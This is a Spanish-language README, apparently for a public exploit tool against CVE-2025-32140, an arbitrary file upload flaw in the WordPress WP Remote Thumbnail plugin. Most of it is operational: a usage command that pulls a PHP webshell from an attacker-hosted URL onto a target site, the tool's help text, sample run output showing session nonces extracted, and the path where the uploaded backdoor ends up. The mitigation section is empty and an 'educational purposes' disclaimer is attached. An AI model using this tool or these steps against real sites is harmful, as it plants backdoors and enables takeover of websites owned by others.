
WordPress WP Remote Thumbnail Plugin <= 1.3.2 es vulnerable a la subida arbitraria de archivos.
CVE-2025-32140 es una vulnerabilidad crítica en el plugin WP Remote Thumbnail para WordPress. Permite a atacantes autenticados (con permisos de colaborador o superiores) cargar archivos arbitrarios, como webshells, abusando de una funcionalidad defectuosa que acepta URL sin sanear.
El plugin no valida el tipo de archivo ni el contenido obtenido de la URL remote_thumb proporcionada. Esto permite a los atacantes guardar archivos PHP maliciosos (p. ej., backdoors) en el directorio /wp-content/uploads.
edit_post)Este script de Python automatiza la explotación de CVE-2025-32140, realizando los siguientes pasos:
remote_thumb.python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL
Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
--username, -un USERNAME
Username
--password, -p PASSWORD
Password
--user_ID, -uid USER_ID
User ID (usually 1 for admin)
--post_ID, -pid POST_ID
Target post ID
--shell SHELL URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)
[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited
Una vez explotada, la webshell cargada probablemente se almacenará en:
http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php
Reemplace YYYY/MM con el año y mes actuales de la carga.
Para mitigar el riesgo que plantea esta vulnerabilidad:
Este script se proporciona únicamente con fines educativos.
El autor no es responsable del mal uso o de los daños causados por este exploit.
Por: Nxploited ( Khaled Alenazi ) 🌟
| Opción | Alias | Descripción |
|---|
--url | -u | URL del sitio WordPress objetivo (p. ej., http://target.com/wordpress) |
--username | -un | Nombre de usuario de WordPress con privilegios de edición de entradas |
--password | -p | Contraseña del usuario especificado |
--user_ID | -uid | ID de usuario de WordPress (normalmente 1 para administrador) |
--post_ID | -pid | ID de la entrada a editar (puede ser un borrador) |
--shell | URL directa a una webshell PHP alojada en el servidor del atacante |